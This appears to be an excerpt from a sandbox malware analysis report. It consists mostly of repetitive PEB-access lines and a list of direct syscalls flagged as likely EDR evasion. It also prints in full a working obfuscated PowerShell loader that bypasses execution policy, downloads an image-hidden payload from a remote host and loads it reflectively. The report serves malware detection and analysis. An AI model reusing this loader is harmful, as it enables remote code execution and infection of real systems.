Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 mov eax, dword ptr fs:[00000030h] 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033150D9 mov eax, dword ptr fs:[00000030h] 5_2_033150D9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD0C0 mov eax, dword ptr fs:[00000030h] 5_2_032BD0C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD0C0 mov eax, dword ptr fs:[00000030h] 5_2_032BD0C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C20DE mov eax, dword ptr fs:[00000030h] 5_2_032C20DE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032690DB mov eax, dword ptr fs:[00000030h] 5_2_032690DB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF72E mov eax, dword ptr fs:[00000030h] 5_2_032FF72E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03243720 mov eax, dword ptr fs:[00000030h] 5_2_03243720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325F720 mov eax, dword ptr fs:[00000030h] 5_2_0325F720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325F720 mov eax, dword ptr fs:[00000030h] 5_2_0325F720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325F720 mov eax, dword ptr fs:[00000030h] 5_2_0325F720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327C720 mov eax, dword ptr fs:[00000030h] 5_2_0327C720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327C720 mov eax, dword ptr fs:[00000030h] 5_2_0327C720
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h] 5_2_0331B73C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h] 5_2_0331B73C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h] 5_2_0331B73C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331B73C mov eax, dword ptr fs:[00000030h] 5_2_0331B73C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239730 mov eax, dword ptr fs:[00000030h] 5_2_03239730
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03239730 mov eax, dword ptr fs:[00000030h] 5_2_03239730
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03275734 mov eax, dword ptr fs:[00000030h] 5_2_03275734
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327273C mov eax, dword ptr fs:[00000030h] 5_2_0327273C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327273C mov ecx, dword ptr fs:[00000030h] 5_2_0327273C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327273C mov eax, dword ptr fs:[00000030h] 5_2_0327273C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BC730 mov eax, dword ptr fs:[00000030h] 5_2_032BC730
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330972B mov eax, dword ptr fs:[00000030h] 5_2_0330972B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324973A mov eax, dword ptr fs:[00000030h] 5_2_0324973A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324973A mov eax, dword ptr fs:[00000030h] 5_2_0324973A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03245702 mov eax, dword ptr fs:[00000030h] 5_2_03245702
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03245702 mov eax, dword ptr fs:[00000030h] 5_2_03245702
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03247703 mov eax, dword ptr fs:[00000030h] 5_2_03247703
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327C700 mov eax, dword ptr fs:[00000030h] 5_2_0327C700
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03240710 mov eax, dword ptr fs:[00000030h] 5_2_03240710
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03270710 mov eax, dword ptr fs:[00000030h] 5_2_03270710
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327F71F mov eax, dword ptr fs:[00000030h] 5_2_0327F71F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327F71F mov eax, dword ptr fs:[00000030h] 5_2_0327F71F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h] 5_2_0323B765
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h] 5_2_0323B765
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h] 5_2_0323B765
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323B765 mov eax, dword ptr fs:[00000030h] 5_2_0323B765
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03248770 mov eax, dword ptr fs:[00000030h] 5_2_03248770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 mov eax, dword ptr fs:[00000030h] 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03253740 mov eax, dword ptr fs:[00000030h] 5_2_03253740
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03253740 mov eax, dword ptr fs:[00000030h] 5_2_03253740
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03253740 mov eax, dword ptr fs:[00000030h] 5_2_03253740
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327674D mov esi, dword ptr fs:[00000030h] 5_2_0327674D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327674D mov eax, dword ptr fs:[00000030h] 5_2_0327674D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327674D mov eax, dword ptr fs:[00000030h] 5_2_0327674D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CE75D mov eax, dword ptr fs:[00000030h] 5_2_032CE75D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03240750 mov eax, dword ptr fs:[00000030h] 5_2_03240750
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282750 mov eax, dword ptr fs:[00000030h] 5_2_03282750
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282750 mov eax, dword ptr fs:[00000030h] 5_2_03282750
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03313749 mov eax, dword ptr fs:[00000030h] 5_2_03313749
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C4755 mov eax, dword ptr fs:[00000030h] 5_2_032C4755
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h] 5_2_032CF7AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h] 5_2_032CF7AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h] 5_2_032CF7AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h] 5_2_032CF7AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CF7AF mov eax, dword ptr fs:[00000030h] 5_2_032CF7AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C97A9 mov eax, dword ptr fs:[00000030h] 5_2_032C97A9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033137B6 mov eax, dword ptr fs:[00000030h] 5_2_033137B6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032407AF mov eax, dword ptr fs:[00000030h] 5_2_032407AF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326D7B0 mov eax, dword ptr fs:[00000030h] 5_2_0326D7B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F7BA mov eax, dword ptr fs:[00000030h] 5_2_0323F7BA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF78A mov eax, dword ptr fs:[00000030h] 5_2_032FF78A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324D7E0 mov ecx, dword ptr fs:[00000030h] 5_2_0324D7E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032627ED mov eax, dword ptr fs:[00000030h] 5_2_032627ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032627ED mov eax, dword ptr fs:[00000030h] 5_2_032627ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032627ED mov eax, dword ptr fs:[00000030h] 5_2_032627ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CE7E1 mov eax, dword ptr fs:[00000030h] 5_2_032CE7E1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032447FB mov eax, dword ptr fs:[00000030h] 5_2_032447FB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032447FB mov eax, dword ptr fs:[00000030h] 5_2_032447FB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324C7C0 mov eax, dword ptr fs:[00000030h] 5_2_0324C7C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032457C0 mov eax, dword ptr fs:[00000030h] 5_2_032457C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032457C0 mov eax, dword ptr fs:[00000030h] 5_2_032457C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032457C0 mov eax, dword ptr fs:[00000030h] 5_2_032457C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C07C3 mov eax, dword ptr fs:[00000030h] 5_2_032C07C3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E627 mov eax, dword ptr fs:[00000030h] 5_2_0325E627
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F626 mov eax, dword ptr fs:[00000030h] 5_2_0323F626
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03276620 mov eax, dword ptr fs:[00000030h] 5_2_03276620
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03315636 mov eax, dword ptr fs:[00000030h] 5_2_03315636
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03278620 mov eax, dword ptr fs:[00000030h] 5_2_03278620
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324262C mov eax, dword ptr fs:[00000030h] 5_2_0324262C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03271607 mov eax, dword ptr fs:[00000030h] 5_2_03271607
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE609 mov eax, dword ptr fs:[00000030h] 5_2_032BE609
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327F603 mov eax, dword ptr fs:[00000030h] 5_2_0327F603
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325260B mov eax, dword ptr fs:[00000030h] 5_2_0325260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325260B mov eax, dword ptr fs:[00000030h] 5_2_0325260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325260B mov eax, dword ptr fs:[00000030h] 5_2_0325260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325260B mov eax, dword ptr fs:[00000030h] 5_2_0325260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325260B mov eax, dword ptr fs:[00000030h] 5_2_0325260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325260B mov eax, dword ptr fs:[00000030h] 5_2_0325260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325260B mov eax, dword ptr fs:[00000030h] 5_2_0325260B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282619 mov eax, dword ptr fs:[00000030h] 5_2_03282619
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03243616 mov eax, dword ptr fs:[00000030h] 5_2_03243616
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03243616 mov eax, dword ptr fs:[00000030h] 5_2_03243616
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327A660 mov eax, dword ptr fs:[00000030h] 5_2_0327A660
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327A660 mov eax, dword ptr fs:[00000030h] 5_2_0327A660
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03279660 mov eax, dword ptr fs:[00000030h] 5_2_03279660
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03279660 mov eax, dword ptr fs:[00000030h] 5_2_03279660
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03272674 mov eax, dword ptr fs:[00000030h] 5_2_03272674
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330866E mov eax, dword ptr fs:[00000030h] 5_2_0330866E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330866E mov eax, dword ptr fs:[00000030h] 5_2_0330866E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325C640 mov eax, dword ptr fs:[00000030h] 5_2_0325C640
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327C6A6 mov eax, dword ptr fs:[00000030h] 5_2_0327C6A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D6AA mov eax, dword ptr fs:[00000030h] 5_2_0323D6AA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D6AA mov eax, dword ptr fs:[00000030h] 5_2_0323D6AA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032376B2 mov eax, dword ptr fs:[00000030h] 5_2_032376B2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032376B2 mov eax, dword ptr fs:[00000030h] 5_2_032376B2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032376B2 mov eax, dword ptr fs:[00000030h] 5_2_032376B2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032766B0 mov eax, dword ptr fs:[00000030h] 5_2_032766B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C368C mov eax, dword ptr fs:[00000030h] 5_2_032C368C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C368C mov eax, dword ptr fs:[00000030h] 5_2_032C368C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C368C mov eax, dword ptr fs:[00000030h] 5_2_032C368C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C368C mov eax, dword ptr fs:[00000030h] 5_2_032C368C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244690 mov eax, dword ptr fs:[00000030h] 5_2_03244690
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03244690 mov eax, dword ptr fs:[00000030h] 5_2_03244690
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h] 5_2_032D36EE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h] 5_2_032D36EE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h] 5_2_032D36EE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h] 5_2_032D36EE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h] 5_2_032D36EE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D36EE mov eax, dword ptr fs:[00000030h] 5_2_032D36EE
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326D6E0 mov eax, dword ptr fs:[00000030h] 5_2_0326D6E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326D6E0 mov eax, dword ptr fs:[00000030h] 5_2_0326D6E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032736EF mov eax, dword ptr fs:[00000030h] 5_2_032736EF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BE6F2 mov eax, dword ptr fs:[00000030h] 5_2_032BE6F2

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_1492.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
